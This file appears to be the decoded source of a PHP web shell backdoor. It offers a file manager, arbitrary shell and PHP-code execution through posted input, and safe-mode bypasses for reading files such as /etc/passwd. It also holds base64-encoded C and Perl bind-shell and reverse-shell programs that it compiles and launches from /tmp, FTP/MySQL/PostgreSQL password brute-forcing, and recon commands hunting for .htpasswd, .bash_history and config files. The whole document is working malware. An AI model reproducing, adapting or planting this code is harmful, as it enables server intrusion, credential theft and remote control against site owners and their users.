/* Decoded by unphp.net */ [ Writeable ]" : " (Not writable)"; echo " \xa \x9\xa \x9\xa \x9 \x9\xa \x9 \x9 \xa\x9 \x9\x9\xa \xa
Change dir:
Read file:
Make dir:{$is_writable}
Make file:{$is_writable}
Execute:
\xa\x9 \x9 \xa\x9 \x9\xa \x9 Upload file:{$is_writable}

\x9\xa "; } goto DJcUw; nbMDY: function formatSizeUnits($bytes) { if ($bytes >= 1073741824) { $bytes = number_format($bytes / 1073741824, 2) . " GB"; } elseif ($bytes >= 1048576) { $bytes = number_format($bytes / 1048576, 2) . " MB"; } elseif ($bytes >= 1024) { $bytes = number_format($bytes / 1024, 2) . " KB"; } elseif ($bytes > 1) { $bytes = $bytes . " bytes"; } elseif ($bytes == 1) { $bytes = $bytes . " byte"; } else { $bytes = "0 bytes"; } return $bytes; } goto XXrTo; O8Bkq: function actionSelfRemove() { if ($_POST["p1"] == "yes") { if ( @unlink( preg_replace( "!\(\d+\)\s.*!", "", __FILE__ ) ) ) { die( "Shell has been removed" ); } else { echo "unlink error!"; } } if ($_POST["p1"] != "yes") { hardHeader(); } echo "

Suicide

Really want to remove the shell?
Yes
"; hardFooter(); } goto u4WS6; KOaKG: function actionFilesMan() { if (!empty($_COOKIE["f"])) { $_COOKIE["f"] = @unserialize($_COOKIE["f"]); } if (!empty($_POST["p1"])) { switch ($_POST["p1"]) { case "uploadFile": if ( is_array( $_FILES["f"]["tmp_name"] ) ) { foreach ( $_FILES["f"]["tmp_name"] as $i => $tmpName ) { if ( !@move_uploaded_file( $tmpName, $_FILES["f"]["name"][$i] ) ) { echo "Can't upload file!"; } } } break; case "mkdir": if (!@mkdir($_POST["p2"])) { echo "Can't create new dir"; } break; case "delete": function deleteDir($path) { $path = substr($path, -1) == "/" ? $path : $path . "/"; $dh = opendir($path); while (($▟ = readdir($dh)) !== false) { $▟ = $path . $▟; if (basename($▟) == ".." || basename($▟) == ".") { continue; } $type = filetype($▟); if ($type == "dir") { deleteDir($▟); } else { @unlink($▟); } } closedir($dh); @rmdir($path); } if (is_array(@$_POST["f"])) { foreach ($_POST["f"] as $f) { if ($f == "..") { continue; } $f = urldecode($f); if (is_dir($f)) { deleteDir($f); } else { @unlink($f); } } } break; case "paste": if ($_COOKIE["act"] == "copy") { function copy_paste($c, $s, $d) { if (is_dir($c . $s)) { mkdir($d . $s); $h = @opendir($c . $s); while (($f = @readdir($h)) !== false) { if ($f != "." and $f != "..") { copy_paste( $c . $s . "/", $f, $d . $s . "/" ); } } } elseif (is_file($c . $s)) { @copy($c . $s, $d . $s); } } foreach ($_COOKIE["f"] as $f) { copy_paste( $_COOKIE["c"], $f, $GLOBALS["cwd"] ); } } elseif ($_COOKIE["act"] == "move") { function move_paste($c, $s, $d) { if (is_dir($c . $s)) { mkdir($d . $s); $h = @opendir($c . $s); while (($f = @readdir($h)) !== false) { if ($f != "." and $f != "..") { copy_paste( $c . $s . "/", $f, $d . $s . "/" ); } } } elseif (@is_file($c . $s)) { @copy($c . $s, $d . $s); } } foreach ($_COOKIE["f"] as $f) { @rename( $_COOKIE["c"] . $f, $GLOBALS["cwd"] . $f ); } } elseif ($_COOKIE["act"] == "zip") { if ( class_exists("ZipArchive") ) { $zip = new ZipArchive(); if ($zip->open($_POST["p2"], 1)) { chdir($_COOKIE["c"]); foreach ($_COOKIE["f"] as $f) { if ($f == "..") { continue; } if (@is_file($_COOKIE["c"] . $f)) { $zip->addFile($_COOKIE["c"] . $f, $f); } elseif (@is_dir($_COOKIE["c"] . $f)) { $iterator = new RecursiveIteratorIterator( new RecursiveDirectoryIterator( $f . "/", FilesystemIterator::SKIP_DOTS ) ); foreach ($iterator as $key => $value) { $zip->addFile(realpath($key), $key); } } } chdir($GLOBALS["cwd"]); $zip->close(); } } } elseif ($_COOKIE["act"] == "unzip") { if ( class_exists("ZipArchive") ) { $zip = new ZipArchive(); foreach ($_COOKIE["f"] as $f) { if ($zip->open($_COOKIE["c"] . $f)) { $zip->extractTo($GLOBALS["cwd"]); $zip->close(); } } } } elseif ($_COOKIE["act"] == "tar") { chdir($_COOKIE["c"]); $_COOKIE["f"] = array_map( "escapeshellarg", $_COOKIE["f"] ); ex( "tar cfzv " . escapeshellarg($_POST["p2"]) . " " . implode(" ", $_COOKIE["f"]) ); chdir($GLOBALS["cwd"]); } unset($_COOKIE["f"]); setcookie("f", "", time() - 3600); break; default: if (!empty($_POST["p1"])) { prototype("act", $_POST["p1"]); prototype("f", serialize(@$_POST["f"])); prototype("c", @$_POST["c"]); } break; } } hardHeader(); echo "

File manager

"; $dirContent = hardScandir( isset($_POST["c"]) ? $_POST["c"] : $GLOBALS["cwd"] ); if ($dirContent === false) { echo "Can't open this folder!"; hardFooter(); return; } global $sort; $sort = ["name", 1]; if (!empty($_POST["p1"])) { if ( preg_match( "!s_([A-z]+)_(\d{1})!", $_POST["p1"], $match ) ) { $sort = [$match[1], (int) $match[2]]; } } echo " \xa"; $dirs = $files = []; $n = count($dirContent); for ($i = 0; $i < $n; $i++) { $ow = @posix_getpwuid(@fileowner($dirContent[$i])); $gr = @posix_getgrgid(@filegroup($dirContent[$i])); $tmp = [ "name" => $dirContent[$i], "path" => $GLOBALS["cwd"] . $dirContent[$i], "modify" => date( "Y-m-d H:i:s", @filemtime($GLOBALS["cwd"] . $dirContent[$i]) ), "perms" => viewPermsColor( $GLOBALS["cwd"] . $dirContent[$i] ), "size" => @filesize( $GLOBALS["cwd"] . $dirContent[$i] ), "owner" => $ow["name"] ? $ow["name"] : @fileowner($dirContent[$i]), "group" => $gr["name"] ? $gr["name"] : @filegroup($dirContent[$i]), ]; if (@is_file($GLOBALS["cwd"] . $dirContent[$i])) { $files[] = array_merge($tmp, [ "type" => "file", ]); } elseif (@is_link($GLOBALS["cwd"] . $dirContent[$i])) { $dirs[] = array_merge($tmp, [ "type" => "link", "link" => readlink($tmp["path"]), ]); } elseif ( @is_dir($GLOBALS["cwd"] . $dirContent[$i]) && $dirContent[$i] != "." ) { $dirs[] = array_merge($tmp, ["type" => "dir"]); } } $GLOBALS["sort"] = $sort; function cmp($a, $b) { if ($GLOBALS["sort"][0] != "size") { return strcmp( strtolower($a[$GLOBALS["sort"][0]]), strtolower($b[$GLOBALS["sort"][0]]) ) * ($GLOBALS["sort"][1] ? 1 : -1); } else { return ($a["size"] < $b["size"] ? -1 : 1) * ($GLOBALS["sort"][1] ? 1 : -1); } } usort($files, "cmp"); usort($dirs, "cmp"); $files = array_merge($dirs, $files); $l = 0; foreach ($files as $f) { echo ""; $l = $l ? 0 : 1; } echo "
NameSizeModifyOwner/GroupPermissionsActions
" . htmlspecialchars($f["name"]) : "g('FilesMan','" . $f["path"] . "');" " . (empty($f["link"]) ? "" : "title='{$f["link"]}'") . ">[ " . htmlspecialchars($f["name"]) . " ]") . "" . ($f["type"] == "file" ? viewSize($f["size"]) : $f["type"]) . "" . $f["modify"] . "" . $f["owner"] . "/" . $f["group"] . "" . $f["perms"] . "R T" . ($f["type"] == "file" ? " F E D" : "") . "
\xa\x9 \xa \xa\x9"; if ( !empty($_COOKIE["act"]) && @count($_COOKIE["f"]) && ($_COOKIE["act"] == "zip" || $_COOKIE["act"] == "tar") ) { echo " file name:  "; } echo "
"; hardFooter(); } goto Bpag2; rc2dt: function ex($in) { $▖ = ""; if (function_exists("exec")) { @exec($in, $▖); $▖ = @join("\xa", $▖); } elseif (function_exists("passthru")) { ob_start(); @passthru($in); $▖ = ob_get_clean(); } elseif (function_exists("system")) { ob_start(); @system($in); $▖ = ob_get_clean(); } elseif (function_exists("shell_exec")) { $▖ = shell_exec($in); } elseif (is_resource($f = @popen($in, "r"))) { $▖ = ""; while (!@feof($f)) { $▖ .= fread($f, 1024); } pclose($f); } else { return "\342\x86\xb3 Unable to execute command\xa"; } return $▖ == "" ? "\342\206\263 Query did not return anything " : $▖; } goto YQzoR; r2c06: @ini_set("log_errors", 0); goto dPBlO; XGk3X: if ($os == "win") { $aliases = [ "List Directory" => "dir", "Find index.php in current dir" => "dir /s /w /b index.php", "Find *config*.php in current dir" => "dir /s /w /b *config*.php", "Show active connections" => "netstat -an", "Show running services" => "net start", "User accounts" => "net user", "Show computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all", ]; } else { $aliases = [ "List dir" => "ls -lha", "list file attributes on a Linux second extended file system" => "lsattr -va", "show opened ports" => "netstat -an | grep -i listen", "process status" => "ps aux", "Find" => "", "find all suid files" => "find / -type f -perm -04000 -ls", "find suid files in current dir" => "find . -type f -perm -04000 -ls", "find all sgid files" => "find / -type f -perm -02000 -ls", "find sgid files in current dir" => "find . -type f -perm -02000 -ls", "find config.inc.php files" => "find / -type f -name config.inc.php", "find config* files" => "find / -type f -name "config*"", "find config* files in current dir" => "find . -type f -name "config*"", "find all writable folders and files" => "find / -perm -2 -ls", "find all writable folders and files in current dir" => "find . -perm -2 -ls", "find all service.pwd files" => "find / -type f -name service.pwd", "find service.pwd files in current dir" => "find . -type f -name service.pwd", "find all .htpasswd files" => "find / -type f -name .htpasswd", "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", "find all .bash_history files" => "find / -type f -name .bash_history", "find .bash_history files in current dir" => "find . -type f -name .bash_history", "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", "Locate" => "", "locate httpd.conf files" => "locate httpd.conf", "locate vhosts.conf files" => "locate vhosts.conf", "locate proftpd.conf files" => "locate proftpd.conf", "locate psybnc.conf files" => "locate psybnc.conf", "locate my.conf files" => "locate my.conf", "locate admin.php files" => "locate admin.php", "locate cfg.php files" => "locate cfg.php", "locate conf.php files" => "locate conf.php", "locate config.dat files" => "locate config.dat", "locate config.php files" => "locate config.php", "locate config.inc files" => "locate config.inc", "locate config.inc.php" => "locate config.inc.php", "locate config.default.php files" => "locate config.default.php", "locate config* files " => "locate config", "locate .conf files" => "locate '.conf'", "locate .pwd files" => "locate '.pwd'", "locate .sql files" => "locate '.sql'", "locate .htpasswd files" => "locate '.htpasswd'", "locate .bash_history files" => "locate '.bash_history'", "locate .mysql_history files" => "locate '.mysql_history'", "locate .fetchmailrc files" => "locate '.fetchmailrc'", "locate backup files" => "locate backup", "locate dump files" => "locate dump", "locate priv files" => "locate priv", ]; } goto Y2Zvy; TA8hx: $▜ = "UTF-8"; goto TQhs6; fqre7: if ($os == "win") { $home_cwd = str_replace("\", "/", $home_cwd); $cwd = str_replace("\", "/", $cwd); } goto wJWJM; ewK8X: if (empty($_POST["charset"])) { $_POST["charset"] = $▜; } goto hJVFy; ee0Wn: $▛ = md5($pw_unhashed); goto z59JV; gaWab: function actionNetwork() { hardHeader(); $back_connect_c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9"; $back_connect_p = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; $bind_port_c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9"; $bind_port_p = "IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0="; echo "

Network tools

\xa\x9
\xa Bind port to /bin/sh
\xa Port: Password: Using:
\xa\x9
\x9Back-connect to
Server: Port: Using: \xa\x9

"; if (isset($_POST["p1"])) { function cf($f, $t) { ($w = @fopen($f, "w")) or @function_exists( "file_put_contents" ); if ($w) { @fwrite($w, @base64_decode($t)) or @fputs($w, @base64_decode($t)) or @file_put_contents($f, @base64_decode($t)); @fclose($w); } } if ($_POST["p1"] == "bpc") { cf("/tmp/bp.c", $bind_port_c); $▖ = ex( "gcc -o /tmp/bp /tmp/bp.c" ); @unlink("/tmp/bp.c"); $▖ .= ex( "/tmp/bp " . $_POST["p2"] . " " . $_POST["p3"] . " &" ); echo "
{$▖}" . 
                ex( 
                    "ps aux | grep bp" 
                ) . 
                "
"; } if ($_POST["p1"] == "bpp") { cf("/tmp/bp.pl", $bind_port_p); $▖ = ex( which("perl") . " /tmp/bp.pl " . $_POST["p2"] . " &" ); echo "
{$▖}" . 
                ex( 
                    "ps aux | grep bp.pl" 
                ) . 
                "
"; } if ($_POST["p1"] == "bcc") { cf("/tmp/bc.c", $back_connect_c); $▖ = ex( "gcc -o /tmp/bc /tmp/bc.c" ); @unlink("/tmp/bc.c"); $▖ .= ex( "/tmp/bc " . $_POST["p2"] . " " . $_POST["p3"] . " &" ); echo "
{$▖}" . 
                ex( 
                    "ps aux | grep bc" 
                ) . 
                "
"; } if ($_POST["p1"] == "bcp") { cf("/tmp/bc.pl", $back_connect_p); $▖ = ex( which("perl") . " /tmp/bc.pl " . $_POST["p2"] . " " . $_POST["p3"] . " &" ); echo "
{$▖}" . 
                ex( 
                    "ps aux | grep bc.pl" 
                ) . 
                "
"; } } echo "
"; hardFooter(); } goto PYh2w; aQUM2: function actionSafeMode() { $temp = ""; ob_start(); switch ($_POST["p1"]) { case 1: $temp = @tempnam($test, "cx"); if ( @copy( "compress.zlib://" . $_POST["p2"], $temp ) ) { echo @file_get_contents($temp); unlink($temp); } else { echo "Sorry... Can't open file"; } break; case 2: $files = glob($_POST["p2"] . "*"); if (is_array($files)) { foreach ($files as $filename) { echo $filename . " "; } } break; case 3: $ch = curl_init( "file://" . $_POST["p2"] . "\x0" . SELF_PATH ); curl_exec($ch); break; case 4: ini_restore("safe_mode"); ini_restore("open_basedir"); include $_POST["p2"]; break; case 5: for ( ; $_POST["p2"] <= $_POST["p3"]; $_POST["p2"]++ ) { $uid = @posix_getpwuid($_POST["p2"]); if ($uid) { echo join(":", $uid) . " "; } } break; case 6: if (!function_exists("imap_open")) { break; } $stream = imap_open($_POST["p2"], "", ""); if ($stream == false) { break; } echo imap_body($stream, 1); imap_close($stream); break; } $temp = ob_get_clean(); hardHeader(); echo "

Safe mode bypass

"; echo "Copy (read file)

Glob (list dir)

Curl (read file)

Ini_restore (read file)

Posix_getpwuid ("Read" /etc/passwd)
From
To


Imap_open (read file)
"; if ($temp) { echo "
" . 
            $temp . 
            "
"; } echo "
"; hardFooter(); } goto W_qyb; YQzoR: function viewSize($s) { if ($s >= 1073741824) { return sprintf("%1.2f", $s / 1073741824) . " GB"; } elseif ($s >= 1048576) { return sprintf("%1.2f", $s / 1048576) . " MB"; } elseif ($s >= 1024) { return sprintf("%1.2f", $s / 1024) . " KB"; } else { return $s . " B"; } } goto XXfsY; WMTEU: function actionPhp() { if (isset($_POST["ajax"])) { $_COOKIE[ md5($_SERVER["HTTP_HOST"]) . "ajax" ] = true; ob_start(); eval($_POST["p1"]); $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='" . addcslashes( htmlspecialchars(ob_get_clean()), "\xa\xd \'\0" ) . "'; "; echo strlen($temp), " ", $temp; die(); } hardHeader(); if (isset($_POST["p2"]) && $_POST["p2"] == "info") { echo "

PHP info

"; ob_start(); phpinfo(); $tmp = ob_get_clean(); $tmp = preg_replace( "!body {.*}!msiU", "", $tmp ); $tmp = preg_replace( "!a:\w+ {.*}!msiU", "", $tmp ); $tmp = preg_replace("!h1!msiU", "h2", $tmp); $tmp = preg_replace( "!td, th {(.*)}!msiU", ".e, .v, .h, .h th {$1}", $tmp ); $tmp = preg_replace( "!body, td, th, h2, h2 {.*}!msiU", "", $tmp ); echo $tmp; echo "

"; } if (empty($_POST["ajax"]) && !empty($_POST["p1"])) { $_COOKIE[ md5($_SERVER["HTTP_HOST"]) . "ajax" ] = false; } echo "

Execution PHP-code

"; echo " send using AJAX
"; 
    if (!empty($_POST["p1"])) { 
        ob_start(); 
        eval($_POST["p1"]); 
        echo htmlspecialchars(ob_get_clean()); 
    } 
    echo "
"; hardFooter(); } goto KOaKG; hJVFy: if (!isset($_POST["ne"])) { if (isset($_POST["a"])) { $_POST["a"] = iconv( "utf-8", $_POST["charset"], decrypt( $_POST["a"], $_COOKIE[ md5($_SERVER["HTTP_HOST"]) . "key" ] ) ); } if (isset($_POST["c"])) { $_POST["c"] = iconv( "utf-8", $_POST["charset"], decrypt( $_POST["c"], $_COOKIE[ md5($_SERVER["HTTP_HOST"]) . "key" ] ) ); } if (isset($_POST["p1"])) { $_POST["p1"] = iconv( "utf-8", $_POST["charset"], decrypt( $_POST["p1"], $_COOKIE[ md5($_SERVER["HTTP_HOST"]) . "key" ] ) ); } if (isset($_POST["p2"])) { $_POST["p2"] = iconv( "utf-8", $_POST["charset"], decrypt( $_POST["p2"], $_COOKIE[ md5($_SERVER["HTTP_HOST"]) . "key" ] ) ); } if (isset($_POST["p3"])) { $_POST["p3"] = iconv( "utf-8", $_POST["charset"], decrypt( $_POST["p3"], $_COOKIE[ md5($_SERVER["HTTP_HOST"]) . "key" ] ) ); } } goto nbMDY; ZuuFx: $safe_mode = @ini_get("safe_mode"); goto AH6j_; p2UEO: @ini_set("error_log", null); goto r2c06; XXfsY: function perms($p) { if (($p & 49152) == 49152) { $i = "s"; } elseif (($p & 40960) == 40960) { $i = "l"; } elseif (($p & 32768) == 32768) { $i = "-"; } elseif (($p & 24576) == 24576) { $i = "b"; } elseif (($p & 16384) == 16384) { $i = "d"; } elseif (($p & 8192) == 8192) { $i = "c"; } elseif (($p & 4096) == 4096) { $i = "p"; } else { $i = "u"; } $i .= $p & 256 ? "r" : "-"; $i .= $p & 128 ? "w" : "-"; $i .= $p & 64 ? ($p & 2048 ? "s" : "x") : ($p & 2048 ? "S" : "-"); $i .= $p & 32 ? "r" : "-"; $i .= $p & 16 ? "w" : "-"; $i .= $p & 8 ? ($p & 1024 ? "s" : "x") : ($p & 1024 ? "S" : "-"); $i .= $p & 4 ? "r" : "-"; $i .= $p & 2 ? "w" : "-"; $i .= $p & 1 ? ($p & 512 ? "t" : "x") : ($p & 512 ? "T" : "-"); return $i; } goto Y5ImI; Y2Zvy: function actionConsole() { if (!empty($_POST["p1"]) && !empty($_POST["p2"])) { prototype( md5($_SERVER["HTTP_HOST"]) . "stderr_to_out", true ); $_POST["p1"] .= " 2>&1"; } elseif (!empty($_POST["p1"])) { prototype( md5($_SERVER["HTTP_HOST"]) . "stderr_to_out", 0 ); } if (isset($_POST["ajax"])) { prototype( md5($_SERVER["HTTP_HOST"]) . "ajax", true ); ob_start(); echo "d.cf.cmd.value='';\xa"; $temp = @iconv( $_POST["charset"], "UTF-8", addcslashes( "\xa$ " . $_POST["p1"] . "\xa" . ex($_POST["p1"]), "\xa\xd\x9\'\x0" ) ); if ( preg_match( "!.*cd\s+([^;]+)$!", $_POST["p1"], $match ) ) { if (@chdir($match[1])) { $GLOBALS["cwd"] = @getcwd(); echo "c_='" . $GLOBALS["cwd"] . "';"; } } echo "d.cf.output.value+='" . $temp . "';"; echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;"; $temp = ob_get_clean(); echo strlen($temp), "\xa", $temp; die(); } if (empty($_POST["ajax"]) && !empty($_POST["p1"])) { prototype( md5($_SERVER["HTTP_HOST"]) . "ajax", 0 ); } hardHeader(); echo ""; echo "

Console

send using AJAX redirect stderr to stdout (2>&1)
$
"; echo "
"; hardFooter(); } goto WMTEU; G8cmK: function actionBruteforce() { hardHeader(); if (isset($_POST["proto"])) { echo "

Results

Type: " . htmlspecialchars($_POST["proto"]) . " Server: " . htmlspecialchars($_POST["server"]) . "
"; if ($_POST["proto"] == "ftp") { function bruteForce($ip, $port, $login, $pass) { $fp = @ftp_connect($ip, $port ? $port : 21); if (!$fp) { return false; } $res = @ftp_login($fp, $login, $pass); @ftp_close($fp); return $res; } } elseif ($_POST["proto"] == "mysql") { function bruteForce($ip, $port, $login, $pass) { $res = @mysql_connect( $ip . ":" . ($port ? $port : 3306), $login, $pass ); @mysql_close($res); return $res; } } elseif ($_POST["proto"] == "pgsql") { function bruteForce($ip, $port, $login, $pass) { $str = "host='" . $ip . "' port='" . $port . "' user='" . $login . "' password='" . $pass . "' dbname=postgres"; $res = @pg_connect($str); @pg_close($res); return $res; } } $success = 0; $attempts = 0; $server = explode(":", $_POST["server"]); if ($_POST["type"] == 1) { $temp = @file("/etc/passwd"); if (is_array($temp)) { foreach ($temp as $line) { $line = explode(":", $line); ++$attempts; if ( bruteForce(@$server[0], @$server[1], $line[0], $line[0]) ) { $success++; echo "" . htmlspecialchars($line[0]) . ":" . htmlspecialchars($line[0]) . "
"; } if (@$_POST["reverse"]) { $tmp = ""; for ($i = strlen($line[0]) - 1; $i >= 0; --$i) { $tmp .= $line[0][$i]; } ++$attempts; if ( bruteForce(@$server[0], @$server[1], $line[0], $tmp) ) { $success++; echo "" . htmlspecialchars($line[0]) . ":" . htmlspecialchars($tmp); } } } } } elseif ($_POST["type"] == 2) { $temp = @file($_POST["dict"]); if (is_array($temp)) { foreach ($temp as $line) { $line = trim($line); ++$attempts; if ( bruteForce( $server[0], @$server[1], $_POST["login"], $line ) ) { $success++; echo "" . htmlspecialchars($_POST["login"]) . ":" . htmlspecialchars($line) . "
"; } } } } echo "Attempts: {$attempts} Success: {$success}

"; } echo "

FTP bruteforce

" . "" . "" . "" . "" . "" . "" . "
Type
" . "" . "" . "" . "" . "Server:port
Brute type /etc/passwd
reverse (login -> nigol)
Dictionary
" . "" . "" . "
Login
Dictionary
" . "
"; echo "
"; hardFooter(); } goto hgt_8; n9j03: function hardScandir($dir) { if (function_exists("scandir")) { return scandir($dir); } else { $dh = opendir($dir); while (false !== ($filename = readdir($dh))) { $files[] = $filename; } return $files; } } goto iBn85; mdCfK: @define("VERSION", "4.2.5"); goto PnC_E; MQqk2: function actionFilesTools() { if (isset($_POST["p1"])) { $_POST["p1"] = urldecode($_POST["p1"]); } if (@$_POST["p2"] == "download") { if (@is_file($_POST["p1"]) && @is_readable($_POST["p1"])) { ob_start("ob_gzhandler", 4096); header( "Content-Disposition: attachment; filename=" . basename($_POST["p1"]) ); if ( function_exists( "mime_content_type" ) ) { $type = @mime_content_type($_POST["p1"]); header( "Content-Type: " . $type ); } else { header( "Content-Type: application/octet-stream" ); } $fp = @fopen($_POST["p1"], "r"); if ($fp) { while (!@feof($fp)) { echo @fread($fp, 1024); } fclose($fp); } } die(); } if (@$_POST["p2"] == "mkfile") { if (!file_exists($_POST["p1"])) { $fp = @fopen($_POST["p1"], "w"); if ($fp) { $_POST["p2"] = "edit"; fclose($fp); } } } hardHeader(); echo "

File tools

"; if (!file_exists(@$_POST["p1"])) { echo "File not exists"; hardFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST["p1"])); if (!$uid) { $uid["name"] = @fileowner($_POST["p1"]); $gid["name"] = @filegroup($_POST["p1"]); } else { $gid = @posix_getgrgid(@filegroup($_POST["p1"])); } echo "Name: " . htmlspecialchars(@basename($_POST["p1"])) . " Size: " . (is_file($_POST["p1"]) ? viewSize(filesize($_POST["p1"])) : "-") . " Permission: " . viewPermsColor($_POST["p1"]) . " Owner/Group: " . $uid["name"] . "/" . $gid["name"] . "
"; echo "Create time: " . date( "Y-m-d H:i:s", filectime($_POST["p1"]) ) . " Access time: " . date( "Y-m-d H:i:s", fileatime($_POST["p1"]) ) . " Modify time: " . date( "Y-m-d H:i:s", filemtime($_POST["p1"]) ) . "

"; if (empty($_POST["p2"])) { $_POST["p2"] = "view"; } if (is_file($_POST["p1"])) { $m = [ "View", "Highlight", "Download", "Hexdump", "Edit", "Chmod", "Rename", "Touch", "Frame", ]; } else { $m = [ "Chmod", "Rename", "Touch", ]; } foreach ($m as $v) { echo "" . (strtolower($v) == @$_POST["p2"] ? "[ " . $v . " ]" : $v) . " "; } echo "

"; switch ($_POST["p2"]) { case "view": echo "
"; 
            $fp = @fopen($_POST["p1"], "r"); 
            if ($fp) { 
                while (!@feof($fp)) { 
                    echo htmlspecialchars(@fread($fp, 1024)); 
                } 
                @fclose($fp); 
            } 
            echo "
"; break; case "highlight": if (@is_readable($_POST["p1"])) { echo "
"; $oRb = @highlight_file($_POST["p1"], true); echo str_replace( [""], [""], $oRb ) . "
